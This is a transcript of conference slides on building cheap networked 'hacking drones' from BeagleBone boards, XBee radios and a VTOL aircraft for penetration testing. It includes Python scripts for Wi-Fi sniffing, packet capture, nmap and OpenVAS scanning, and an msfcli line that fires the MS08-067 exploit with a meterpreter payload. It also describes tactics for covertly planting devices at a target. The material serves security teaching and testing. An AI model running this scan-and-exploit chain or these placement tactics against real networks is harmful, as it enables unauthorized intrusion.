
Autonomous Remote Hacking Drones - Dr. Phil Polstra

Date post: 13-May-2015
Upload: shakacon
Description:
Are you tired of running pentests from a van outside your target? Working 24x7 hunched over your laptop got you down? Wouldn't you rather drop a few hacking devices outside/inside your target and monitor the test poolside at your hotel down the street? This talk will show you how to build inexpensive hacking drones that can be controlled from up to a mile away and can be run for days on batteries. Devices can be used as pentesting desktops, hacking drones, or dropboxes with no software changes. Drone costs range from $45-$85. All hardware and software used is open source.
Dr. Phil Polstra @ppolstra Bloomsburg University of Pennsylvania Autonomous Remote Hacking Drones
Transcript
Page 1: Autonomous Remote Hacking Drones - Dr. Phil Polstra

Dr. Phil Polstra @ppolstra

Bloomsburg University of Pennsylvania

Autonomous Remote Hacking Drones

What is this talk about?

- Hacking and/or forensics with small, low-power devices
- ARM-based Beagleboard & Beaglebone running full suite of security/forensics tools
- Performing coordinated attacks with networks of devices
- Using aerial drones for performing and supporting attacks
- Leveraging Python to make attack semi-autonomous

Why You Should Care

- A full-featured Linux install for flexibility
- Low-power devices can run for days on battery power
- Small devices can be planted for later retrieval
- Network of devices enhances hacking from a distance
- Aerial drone can be flown around target
  - Can be useful for initial reconnaissance
  - May be only practical way to access certain targets
- Aerial drone can be landed nearby (roof?)
  - Remote hacking drone
  - Router for other drones planted nearby
  - Combination router and drone

Who am I?

- Professor at Bloomsburg University of Pennsylvania
- Programming from age 8
- Hacking hardware from age 12
- Also known to fly and build airplanes

Roadmap

- Choosing a hacking platform
- Aircraft choices
- The Deck – your new favorite pen testing distro
- Solo ops with The Deck
- Networking with 802.15.4
- Building Drones
- Attacking with an army of devices running The Deck
- Aerial drone scenarios
- Making attacks more autonomous with Python

Choosing a Hacking Platform

- Small
- Low-power
- Affordable
- Mature
- Networking built in
- Good USB support
- Convenient input and output

And the Winning Platform is...

- BeagleBone Black
  - 3.4” x 2.1”
  - <10 Watts (board itself <2 W)
  - Only $45
  - Based on 1GHz Cortex A8
  - 512MB RAM
  - 100 Mbps Ethernet built in
  - high-speed USB plus USB-on-the-go
  - HDMI and LCD output
  - RS-232, webcam, plentiful GPIO, and microSD

BeagleBone Black (aka Raspberry Pi killer)

I know at least one of you will ask...

- Why not Raspberry Pi?
- Not as powerful
- Doesn't run Ubuntu (ARM6 not supported)
- Not truly open (Broadcom won't release info)
- Not as mature
- Raspberry Pi cost more to build full system
- Still limited availability (especially in USA)
- Not as reliable (reported quality and power issues)
- Inefficient – uses more power despite running at lower clock speed
- Limited GPIO
- GPIO is not buffered (easy to fry boards)
- Fragile design (pins vs. headers)
- Not as compact

Choosing an Aircraft

- Good payload
- Can fly in windy conditions
- Capable of vertical takeoff/landing (VTOL)
- Reasonable flight time
- Space for BeagleBone Black
- Space for Xbee
- Space for Alfa wifi adapter
- Affordable

And the winning aircraft is...

Quadshot

- Flying wing with VTOL
- Good wind tolerance
- Half a pound of payload
- Flight as an airplane is more energy efficient and helps in high winds (8-15 minutes)
- Some models use Xbee
- Built in camera mount

The Deck – Your New Favorite Distro

- Originally developed for BeagleBoard-xM
- Ported to run on BeagleBone Black
- Optimized for the Beagles
  - Not someone's half-way effort to port desktop distro
  - Desktop or drone
- All the packages you need (over 1600)
- Based on Ubuntu
  - Good repository support
  - Good community support
  - Minimizes need to build tools from source
- Running latest kernels

Demo 1 – Our Favorite Exploit

Demo 1 (contd.)

Demo 1 (contd.)

Demo 2 – Wifi Cracking

Demo 2 (contd.)

Demo 2 (contd.)

Demo 3 – Password Cracking

Demo 4 – WPS Cracking

Demo 4 (contd.)

Demo 5 – Pwn Win7 Like It's a Mac

Demo 5 (contd.)

Demo 6 – Clickiddies™

802.15.4 Networking

- Basics
- Hardware
- Simple case: 2 Xbee adapters
- Slightly harder case: multiple adapters one at a time
- Hard case: multiple adapters simultaneously
- Really Hard case: true mesh network

802.15.4 Basics

- Typically used in low-power embedded systems
- Regular (300') and Pro (1 mi) versions
- AT and API modes of operation
- Low-speed (250 kbps max)
- Supports multiple network topologies
  - Peer to Peer
  - Star
  - Mesh

Xbee Hardware

Xbee Hardware (contd)

- Manufactured by Digi
- Regular and Pro formats are interchangeable and inter-operable
- Power consumption at 3.3V is 50/295 mA for regular/pro
- Uses 2 mm pin spacing
  - Most breadboards are 0.1” or 2.54 mm
  - Requires an adapter
- Several antenna options
- Be careful not to mix S1 with S2 (ZB) series which are the same dimensions, but are not compatible

Series 1 vs. Series 2

- Series 1 (the original)
  - Slightly higher power consumption (50 vs 40 mA) for regular version
  - Works out of the box
  - Not true mesh networking
- Series 2 (2B and ZB)
  - Must have firmware loaded for each function (coordinator, router, end device)
  - Every network must have a coordinator
  - Coordinators and routers may not go to sleep
  - Recommended for larger pen tests

Simple Case: 2 Xbee Adapters

- Xbee modules must be configured for desired network topology
- Digi provides X-CTU software for configuration, but it only runs on Windows (or use Wine)
- Recently Moltosenso has released Network Manager IRON 1.0 which runs on Linux, Mac, and Windows – free edition is sufficient for our limited usage

Configuring Xbee Modules

- Place Xbee module in USB adapter and connect to PC running X-CTU or IRON
- Select correct USB port and set baud rate (default is 9600)
- From Modem Configuration tab select Read to get current configuration
- Ensure modem is XB24 and Function Set is XBEE 802.15.4 for Series 1
- Set the channel and PAN ID (1337?) noting the settings which must be the same for all modems
- Pick a Destination Low and Destination High address for the other adapter (say 2 and 0)
- Set the My Address to a chosen value (say 01)
- Click Write to store the new config on the Xbee
- Repeat this process on the second Xbee but reverse the addresses
- The modules should now talk to each other just fine

Configuring Xbee Modules (contd)

Simple Case: Accessing your single drone

- By default Xbee adapters operate in transparent mode
- Setup TTY on drone and you can log in with terminal program
- Simple
- Works with interactive programs
- If you go out of range you are still connected when you return

Starting TTY on your drone

- Create a file with the following in /etc/init

```
# ttyO2 - getty
# This service maintains a getty on ttyO2 from the point the system is
# started until it is shut down again.
start on stopped rc RUNLEVEL=[2345]
stop on runlevel [!2345]
respawn
exec /sbin/getty -8 57600 ttyO2
```

- Start with “sudo start ttyO2” (letter O not a zero!)
- Use favorite terminal program to connect

Slightly Harder Case: Multiple Drones One at a Time

- Configure drones as with the single drone case but with different MY addresses
- Use terminal program on command console to connect to drones one at a time
- Simple: no programming required
- Must enter AT command mode to switch between drones
  - Enter “+++” (no enter) and wait for OK
  - Enter “ATDL0002 <enter>” to select drone 2
  - Enter “ATWR <enter>” to write to NVRAM
  - Enter “ATCN <enter>” to exit command mode

Slightly Harder Case: Multiple Drones Simultaneously

- API mode is used vs. AT mode
- Configure Xbee with X-CTU
  - For Series 1 stick with 802.15.4 Function Set
  - For Series 2 (ZB)
    - Drones set to Function Set ZNET 2.5 ROUTER/ENDDEVICE API 1347
    - Controller set to Function Set ZNET 2.5 COORDINATOR API 1147
    - Router can be used to extend range to command console
- Multiple choices for communication
  - Java xbee-api
  - Python-xbee (what I used)
  - Raw commands to TTY device
- Recommended for most situations involving 3 or more devices

Multiple Drone Communications

- Really this is a point-to-multipoint topology
- For each drone communication appears to be simple peer-to-peer
- API mode provides better performance and allows simpler software operation

Multiple Drones Using Python: One Possibility

- Each drone runs a simple Python script which waits for commands and sends announcements
- Controller listens for announcements/responses and sends commands (all activity is logged)
- Upside is that it lends itself easily to scripting
- Downside is that it doesn't support interactive shells (yet)
- Announcements can be sent to controller for important events (such as successful cracking)
- Code is available at https://github.com/ppolstra
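
The slides on API mode and multiple-drone communications do not show what travels over the serial link, so here is an added Python 3 example (not from the talk or the MeshDeck code) of XBee Series 1 API-mode framing without escaping: it builds a TX request for a drone's 16-bit MY address and parses a controller-side receive buffer into per-drone announcements. Function names, drone addresses and payload strings are constructed for illustration.

```python
import struct

START = 0x7E       # API frame start delimiter
TX16 = 0x01        # TX request, 16-bit destination address
RX16 = 0x81        # RX packet, 16-bit source address
MAX_PAYLOAD = 100  # Series 1 RF payload limit per frame
MAX_DATA = 256     # sanity bound on the length field (this example's choice)


def checksum(data):
    """0xFF minus the low byte of the sum of the frame-data bytes."""
    return 0xFF - (sum(data) & 0xFF)


def wrap(data):
    """Add start delimiter, big-endian length and checksum to frame data."""
    return struct.pack(">BH", START, len(data)) + data + bytes([checksum(data)])


def build_tx16(dest, payload, frame_id=1):
    """TX request carrying payload to the radio whose MY address is dest."""
    if not 0 <= dest <= 0xFFFF:
        raise ValueError("destination must be a 16-bit address")
    if len(payload) > MAX_PAYLOAD:
        raise ValueError("payload does not fit in one frame")
    return wrap(struct.pack(">BBHB", TX16, frame_id, dest, 0x00) + payload)


def parse_frames(buf):
    """Return (frames, leftover); noise and corrupt frames are skipped and an
    incomplete trailing frame is left over for the next read."""
    frames, i = [], 0
    while True:
        i = buf.find(bytes([START]), i)
        if i < 0:
            return frames, b""
        if len(buf) - i < 3:
            return frames, buf[i:]
        (length,) = struct.unpack_from(">H", buf, i + 1)
        end = i + 3 + length + 1
        if length > MAX_DATA:
            i += 1                  # implausible length: false start
        elif len(buf) < end:
            return frames, buf[i:]
        elif checksum(buf[i + 3:end - 1]) == buf[end - 1]:
            frames.append(buf[i + 3:end - 1])
            i = end
        else:
            i += 1                  # bad checksum: resync on next 0x7E


def decode_rx16(data):
    """Split RX (0x81) frame data into source, RSSI and payload, else None."""
    if len(data) < 5 or data[0] != RX16:
        return None
    _, src, rssi, _options = struct.unpack_from(">BHBB", data)
    return {"src": src, "rssi_dbm": -rssi, "payload": data[5:]}


def collect_announcements(buf):
    """Group payloads by sending drone, as the controller's log would."""
    frames, leftover = parse_frames(buf)
    by_drone = {}
    for data in frames:
        rx = decode_rx16(data)
        if rx is not None:
            by_drone.setdefault(rx["src"], []).append(rx["payload"])
    return by_drone, leftover


def sample_rx(src, rssi, payload):
    """Constructed RX frame, as the controller's radio would deliver it."""
    return wrap(struct.pack(">BHBB", RX16, src, rssi, 0x00) + payload)


# Constructed buffer: noise, 2 good frames, 1 bad checksum, 1 partial frame.
corrupt = bytearray(sample_rx(0x0002, 42, b"task done"))
corrupt[-1] ^= 0xFF
SAMPLE = (b"\x00noise" + sample_rx(0x0002, 40, b"drone 2 up")
          + sample_rx(0x0003, 71, b"drone 3 up") + bytes(corrupt)
          + sample_rx(0x0003, 70, b"partial")[:6])

if __name__ == "__main__":
    print(collect_announcements(SAMPLE))
```

Prepend the returned leftover to the next serial read so that a frame split across two reads is not lost.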

Harder Case: True Mesh Network

- Recommended when using larger number of drones or when devices are too far apart
- Devices configured as routers or coordinators will have reduced battery life (no sleep)
- Requires series 2 (2B or ZB) Xbee adapters
- No changes to scripts are required

True Mesh Networking (contd)

- At least one modem must have coordinator firmware
- Routers can extend range
  - Pro adapters recommended
  - Drones can use regular adapters to save power
  - Routers need not be connected to a Drone
- Easier to leverage Xbee adapter sleep modes on end devices

Building Drones

Getting The Deck

- Download the archive from http://sourceforge.net/projects/thedeck/
  - Also download the MeshDeck if using 802.15.4
  - Note apt archives removed to save 1.7GB of space
- Upload The Deck to microSD card
  - Class 10 8GB or larger
  - Extract archive to your Linux box
  - From your Linux box “sudo ./setup_sd.sh --mmc /dev/sdX --uboot bone”
  - Will take a while (20-30 minutes)
- Ready to run microSD cards are also available at https://specialcomp.com/beagleboard/thedeck.htm
- If running the MeshDeck
  - Extract the archive to the drone
  - Run the install script

Power Your Drones

- Beagles take standard 2.1 x 5.5 mm barrel connector
- Battery voltage above 5V is wasted as heat
- Bare board can run for several days off standard batteries (~220mA)
- LCD touchscreens require lots of power!
- Leeching off of USB power from a target is ideal
- Be careful with WiFi and 802.15.4
  - Set transmit power to minimum
  - Take advantage of sleep modes on 802.15.4 radios

Power Options

Battery Size    Approx. Runtime
D               54.5 hrs
C               27.3 hrs
AA              13.6 hrs
9V or AAA       6.8 hrs
Lantern         50 hrs
USB 5200        23.6 hrs

802.15.4 Hardware

802.15.4 Hardware

Xbee Adapters

- UART (serial) adapters
  - Can be wired directly to Beagles using 4 wires
  - Don't take up USB ports
- Xbee cape out soon

Xbee Adapters (contd)

- USB Adapters
  - More expensive
  - Helpful for initial setup of modem
  - Easier to setup: just plug it in
  - Laptop connection

Wiring the Xbee to Beagles

- If you splurged for the USB adapter you can just plug in to a USB port
- BeagleBone has only 1 USB port which you might want for something else (WiFi?)
- BeagleBoard has 4 USB ports
- Using the UART interface slightly more complicated
- Connect 4 wires: 3.3V, Ground, TX, RX
- Configure the Beagle multiplexer for proper operation
- If you have an Xbee cape just plug it in

Setting up a UART Interface

- Appropriate pins & modes in Beagle manuals
- For BeagleBone UART2
  - 3.3V & Ground P9 pin 3 & 1, respectively
  - TX P9 pin 21 (to Xbee Din)
  - RX P9 pin 22 (to Xbee Dout)
- Add the following lines to /etc/rc.local BEFORE the exit 0 at the end:

```
# setup the MeshDeck drone
echo BB-UART2 > /sys/devices/bone_capemgr.8/slots
sleep 2
/etc/init.d/meshdeckd start
```

Capes

- Work in progress
- Xbee cape with socket for Xbee radio
- Pwnage cape
- Xbee socket
- Network switch for installing inline
- USB hub
- Optional 802.11 wireless
- AirDeck cape to fly aerial drone

Containers

Containers

Plantables

Plantables

Building the AirDeck

- If you only want a router to extend range
  - Buy the Xbee board from Transition Robotics
  - Program the Xbee modem as a router
  - Install the board
- To install a drone on the Quadshot will need
  - BBB
  - Xbee modem
  - Xbee cape (either DIY or purchased)
  - Alfa AWUS036H wireless adapter
  - 2.1 x 5.5 mm barrel connector for power
  - Short (3-6”) microUSB A-B cable

AirDeck (contd)

- Entire setup installed on brain cover
- Place BBB on cover as shown; mark 4 hole locations with 1/8” drill bit
- Connect to lid using 4-40 screws and standoffs or similar
- 3 nuts per screw
  - 1 on outside to secure screw
  - 2 to lock BBB on lid

AirDeck (contd)

- Remove the BBB from the lid
- Take the Alfa out of its case
- Test fit it to the inside of the cover as shown
- Mark the location of 3/8” hole for antenna
- Drill the 3/8” hole then install on lid to mark mount holes
- Drill mount holes
- Install with 4-40 screws
- Seal with black tape to prevent shorting with LIA board

AirDeck (contd)

- Cut notches for power cable and USB cable as shown in pictures using rotary tool
- You may have to cut back the hard plastic and/or metal shield on USB cable
- Solder the 2.1 x 5.5 barrel connector
  - Center is connected to Vcc on LIA
  - Outer conductor is connected to Ground on LIA
  - UART connectors on upper left are probably best choice for connection
- Install Xbee cape and secure with cable ties
- Install lid and plug in barrel connector
- Go forth and pwn!

AirDeck Ready for Pwnage

Networked attacks – Simplest Case

- In the simplest case there is only 1 drone
- Networking is peer-to-peer
- Allows hacking from a distance
  - Better WiFi hacking when drone is in building
  - Drone runs 24x7
  - Drone can run for days off battery
  - Important updates such as successfully cracked passwords can be sent to master periodically in case you weren't in range when they happened
- Drone has full version of The Deck – lots of possibilities
- Less conspicuous than sitting outside the building
- If you are lucky you can patch into wired network
- If you are extra lucky they use Power Over Ethernet!

Networked Attack with Multiple Drones

- One process on master monitors status updates from all drones
- Interactive shell into each drone
- Multiple subshells can be created
- Processing continues if master disconnects
- Endless possibilities since each drone has full version of The Deck
- Drones are easily retasked based on objectives achieved by other drones

Demo 7 - Trivial example of Two Drones in TTY Mode

Demo 8 - Trivial Example with Two Drone – API Mode Using Python

Python Mode (continued)

Python Mode (continued)

Python Mode (continued)

AirDeck Scenario 1

- Router only mode
  - Used to extend the range of drones planted nearby target
  - Drones may be using regular Xbee adapters to save power
  - Flyby if there are no good landing spots nearby
  - Land if possible
  - Flat roof could be good choice
  - Router can run for days off Quadshot battery

AirDeck Scenario 2

- AirDeck is only drone
  - Useful when drones can't be easily planted
  - Battery on Quadshot allows extended operation
  - Best situation allows you to land on a roof where the AirDeck isn't detected
  - If you screw up and crash on the roof you may still be able to retrieve “your RC toy” from target later

AirDeck Scenario 3

- AirDeck combined with other drones
- Other drones are planted
  - Inside leeching power from target
  - Outside running off of battery
  - Other drones likely using regular Xbee adapters to save power
- AirDeck Xbee adapter configured as a coordinator or router

Automating with Python

Detecting Wireless Networks

```python
from scapy.all import *

# create a list to store networks
ap_list = []

# define a function to be called with each received packet
def packet_handler(pkt):
    # is this a (802.11) packet, in particular a beacon frame
    if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8:
        # is this a network that I used to know?
        if pkt.addr2 not in ap_list:
            ap_list.append(pkt.addr2)
            print("Network %s with ESSID %s detected on channel %s "
                  % (pkt.addr2, pkt.info, str(ord(pkt[Dot11Elt:3].info))))

# main function sniffs for a minute then exits
def main():
    print("Sniffing for wireless networks")
    sniff(iface="mon0", prn=packet_handler, timeout=60)
    print("All done")

if __name__ == '__main__':
    main()
```

Capturing Wireless Packets

```python
from scapy.all import *
import optparse

# create lists to store clients and captured packets
client_list = []
pkt_list = []

# define a function to be called with each received packet
def packet_handler(pkt):
    # is this an 802.11 packet?
    if pkt.haslayer(Dot11):
        pkt_list.append(pkt)
        # is this a client that I used to know?
        if pkt.addr2 not in client_list:
            client_list.append(pkt.addr2)
            print("Client: " + str(pkt.addr2) + " detected")
```

Capturing Wireless Packets (contd)

```python
def main():
    # parse command line options
    parser = optparse.OptionParser('usage %prog -b <BSSID> -e <ESSID>')
    parser.add_option('-b', dest='bssid', type='string', help='target BSSID')
    parser.add_option('-e', dest='essid', type='string', help='target ESSID')
    (options, args) = parser.parse_args()
    bssid = options.bssid
    essid = options.essid
    # if essid and bssid aren't specified exit
    if essid is None or bssid is None:
        print(parser.usage)
        exit(0)
    print("Capturing traffic for ESSID:%s BSSID:%s" % (essid, bssid))
    sniff(iface="mon0", prn=packet_handler, timeout=60)
    # write everything that was captured to <essid>.pcap
    pktcap = PcapWriter(essid + '.pcap', append=True, sync=True)
    pktcap.write(pkt_list)
    pktcap.close()
    print("All done")
    exit(0)

if __name__ == '__main__':
    main()
```

Finding Out What’s There

```python
import nmap, optparse, json

host_list = []

def main():
    # parse command line options
    parser = optparse.OptionParser('usage %prog -t <target host or network> -p <ports> -o <nmap options>')
    parser.add_option('-t', dest='target_net', type='string', help='target host or network')
    parser.add_option('-o', dest='nmops', type='string', help='additional nmap options')
    parser.add_option('-p', dest='ports', type='string', help='port(s) to scan')
    (options, args) = parser.parse_args()
    target_net = options.target_net
    nmops = options.nmops
    ports = options.ports
    # if no target is specified then exit
    if target_net is None:
        print(parser.usage)
        exit(0)
    # now perform the scan
    nm = nmap.PortScanner()
    # if arguments and ports aren't specified use some defaults
    if ports is None:
        ports = '1-1024'
    if nmops is None:
        nmops = '-sV -O'
    nm.scan(target_net, ports, nmops)
```

Finding Out What’s There (contd)

```python
    # print the results
    for host in nm.all_hosts():
        # if it isn't up don't bother to print anything about it
        if nm[host]['status']['state'] == 'up':
            host_list.append(nm[host])
            print('---------------------------------')
            if 'addresses' in nm[host]:
                print("live host detected at %s " % (nm[host]['addresses']['ipv4']))
            else:
                print("live host detected at %s " % (nm[host]['hostname']))
            # now iterate over services
            if 'tcp' in nm[host].keys():
                print('TCP services detected on the following ports:')
                for port in nm[host]['tcp']:
                    print("Port: " + str(port))
                    for k, v in nm[host]['tcp'][port].items():
                        print(" " + str(k) + ": " + str(v))
            if 'udp' in nm[host].keys():
                print('UDP services detected on the following ports:')
                for port in nm[host]['udp']:
                    print("Port: " + str(port))
                    for k, v in nm[host]['udp'][port].items():
                        print(" " + str(k) + ": " + str(v))
    # save the live hosts for the next script
    fp = open('nmap-scan.json', 'w')
    json.dump(host_list, fp)
    fp.close()

if __name__ == '__main__':
    main()
```

Detecting the Vulnerable

```python
import optparse, json, time, xml.etree.ElementTree as ET
import openvas.omplib

host_list = []

def main():
    # parse command line options
    # (optparse reserves -h for help, so its built-in help option is turned off)
    parser = optparse.OptionParser('usage %prog -u <OpenVAS user> -p <OpenVAS password> -h <OpenVAS host>',
                                   add_help_option=False)
    parser.add_option('-u', dest='user', type='string', help='OpenVAS user')
    parser.add_option('-h', dest='ovhost', type='string', help='OpenVAS host, default is localhost')
    parser.add_option('-p', dest='password', type='string', help='OpenVAS password')
    (options, args) = parser.parse_args()
    user = options.user
    password = options.password
    ovhost = options.ovhost
    # if no user specified then exit
    if user is None:
        print(parser.usage)
        exit(0)
    if ovhost is None:
        ovhost = 'localhost'
    # load the host list from JSON file
    fp = open('nmap-scan.json', 'r')
    host_list = json.load(fp)
    fp.close()
```

Detecting the Vulnerable (contd)

```python
    # create the list of targets from nmap scan results
    targets = ""
    for host in host_list:
        targets += str(host['addresses']['ipv4']) + ','
    targets = targets.rstrip(',')
    # now do the scan
    manager = openvas.omplib.OMPClient(host=ovhost)
    manager.open(user, password)
    manager.create_target('nmap-targets', targets, 'targets detected by previous nmap scan')
    task_id = manager.create_task('openvas-scan', target='nmap-targets')
    report_id = manager.start_task(task_id)
    # it will take some time for this scan to run so check every minute
    while True:
        time.sleep(60)
        status = manager.get_task_status(task=task_id)
        if "done" in status.values():
            break
    report = manager.get_report(report_id)
    print(ET.tostring(report))

if __name__ == '__main__':
    main()
```

Script-based Exploitation

General format

```
msfcli /exploit/platform/type/exploit RHOST=<target address> PAYLOAD=platform/payload/bind_method OPTIONX=something OPTIONY=something
```

- I.E.

```
msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.10.103 PAYLOAD=windows/meterpreter/bind_tcp
```

Future Directions

- Continue to add useful packages as need arises
- Optimize some packages for BB-xM/BBB
- Optimize and expand 802.15.4 code
- Other output devices
- Exploit USB OTG functionality
- Replace LIA autopilot with BBB in AirDeck drone
- Hack over the Internet with 802.15.4 gateway

Coming Soon

Use coupon code CNF314 for 30% off this and ANY Syngress title

Questions?

Feel free to track me down during the con or @ppolstra later

